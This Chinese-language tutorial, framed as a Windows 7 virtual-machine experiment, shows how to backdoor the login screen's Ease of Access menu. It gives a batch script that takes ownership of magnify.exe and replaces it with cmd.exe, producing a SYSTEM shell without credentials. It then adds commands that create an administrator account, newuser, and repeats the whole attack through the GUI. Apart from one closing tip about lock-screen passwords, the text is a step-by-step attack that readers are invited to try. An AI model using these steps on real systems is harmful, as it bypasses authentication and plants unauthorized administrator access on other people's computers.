利用 “轻松访问” 轻松创建Windows后门
1. 实验概述
(1)实验环境:
win7虚拟机;
(2)实验描述:
打开win7虚拟机就可以看到左下角有个轻松访问的标志 ,这里面有六个应用,分别是讲述人,放大镜,高对比度,屏幕键盘,粘滞键,筛选键。这六个应用在不用登录电脑账号和密码的情况下就可以直接使用。这个设计是为了让计算机更方便使用。但是在方便使用的时候,也容易被别人留个后门;如果说这六个应用中的一个被别人暗中替换掉了,那就可以实现在不知道账户和密码的情况下,对电脑进行相应的操作。在本次实验中,将给大家简单介绍一下怎么利用“轻松访问”轻松的创建Windows后门;
(3)实验原理:
利用win7登录账户界面中的 “轻松访问” 中的 程序 (本次实验是放大镜),把它替换为cmd.exe程序,实现在不登录的情况下打开cmd命令提示符(系统管理员权限),并进行一些操作,在计算机上留个后门。
2. 实验过程
方式一:命令行的模式(脚本)写后门
(1)登录账户之前,有个轻松访问,左下角标识
(2)我们的实验就是通过这里的轻松访问设置后门(本次实验是在放大镜上设置后门(将放大镜——>变为cmd命令行));
(3)打开记事本,输入如下的命令(蓝色字体):
切换目录到c:\windows\system32;
cd c:\windows\system32
更改文件名为magnify.exe的所有者为当前用户;
takeown /f magnify.exe
将当前用户所在的组(管理员组)赋予完全访问权限;
icacls magnify.exe /grant administrators:F
将可执行文件magnify.exe更名为magnify_back.exe;
ren magnify.exe magnify_back.exe
将cmd.exe复制并更名为magnify.exe;
copy cmd.exe magnify.exe
(4)保存写好的记事本文件为back.bat,并且保存文件的类型为所有文件。
(5)这时候,就可以看到保存好的back.bat文件了。
(6)打开刚刚建立的文件back.bat,点击鼠标右键---->以管理员身份运行--à出现如下类似的窗口(我这是加入了域,如果没有加域的话,直接点击是就可以了,加域的话需要输入用户名和密码)
(7)之后屏幕会闪烁一下,就说明这个后门已经搞好了,接下来,就是测试一下这个后门是否能够成功。
(8)重新启动电脑,可以看到如下界面,可以看到左下角的那个标识——轻松访问。
(9)点击左下角标识,我们可以看到如下界面呈现的页面,因为我们的后门是对放大镜程序做了更改,将放大镜直接更改为以管理员运行的cmd命令操作行,所以,我们点击放大镜,就可以直接进入cmd。
(10)系统在没有输入用户名和密码的情况下,弹出了cmd命令行界面,而且是system权限。
(11)接下来,我们就可以通过这个命令行界面去创建账户,输入如下的命令;
创建一个新的账户:账户名为newuser,密码为:123.com;
net user newuser 123.com /add
将新创建的用户newuser加入到管理员组中;赋予管理员的权限
net localgroup administrators /add newuser
通过创建的账户名和密码,我们以后登录电脑就可以采用我们创建的账户登录。不需要知道原来的账户和密码。
(12)关闭这个窗口,尝试登录系统,就可以成功登录进去了(注意:因为我的电脑加入了域,所有需要输入前面的主机名,如果没有加域的话,就只需要输入newuser即可)
方式二:图像化的方式创建后门
(1)进入c:\windows\system32,找到mangify.exe,将他更名为:mangify_back.exe,此时发现无法更名,需要我们去更改权限。
(2)点击mangify.exe右键-- 安全--高级--所有者---将所有者改为本机登录的账户
(3)由于本机登录的账户是普通用户,所有我们更改普通用户的权限,将其改为完全控制
(4)查看users的权限,可以看到权限是 完全控制。
(5)然后我们将mangify.exe,将他更名为:mangify_back.exe,然后将cmd.exe复制一份并改名为mangify.exe,让系统将cmd.exe认为是mangify.exe。
(6)(如上)重新启动电脑,可以看到如下界面,可以看到左下角的那个标识。
(7)点击左下角标识,我们可以看到如下界面呈现的页面,因为我们的后门是对放大镜程序做了更改,将放大镜直接更改为以管理员运行的cmd命令操作行,所以,我们点击放大镜,就可以直接进入cmd。
(8)系统在没有输入用户名和密码的情况下,弹出了cmd命令行界面,而且是system权限。
(9)接下来,我们就可以通过这个命令行界面去创建账户,输入如下的命令;
创建一个新的账户:账户名为newuser,密码为:123.com;
net user newuser 123.com /add
将新创建的用户newuser加入到管理员组中;赋予管理员的权限
net localgroup administrators /add newuser
通过创建的账户名和密码,我们以后登录电脑就可以采用我们创建的账户登录。不需要知道原来的账户和密码。
(10)关闭这个窗口,尝试登录系统,就可以成功登录进去了(注意:因为我的电脑加入了域,所有需要输入前面的主机名,如果没有加域的话,就只需要输入newuser即可)
是不是很简单呢,大家可以进行尝试操作,还有就是,给自己的电脑增加锁屏密码很有必要,以防不注意被别人在电脑上留个后门。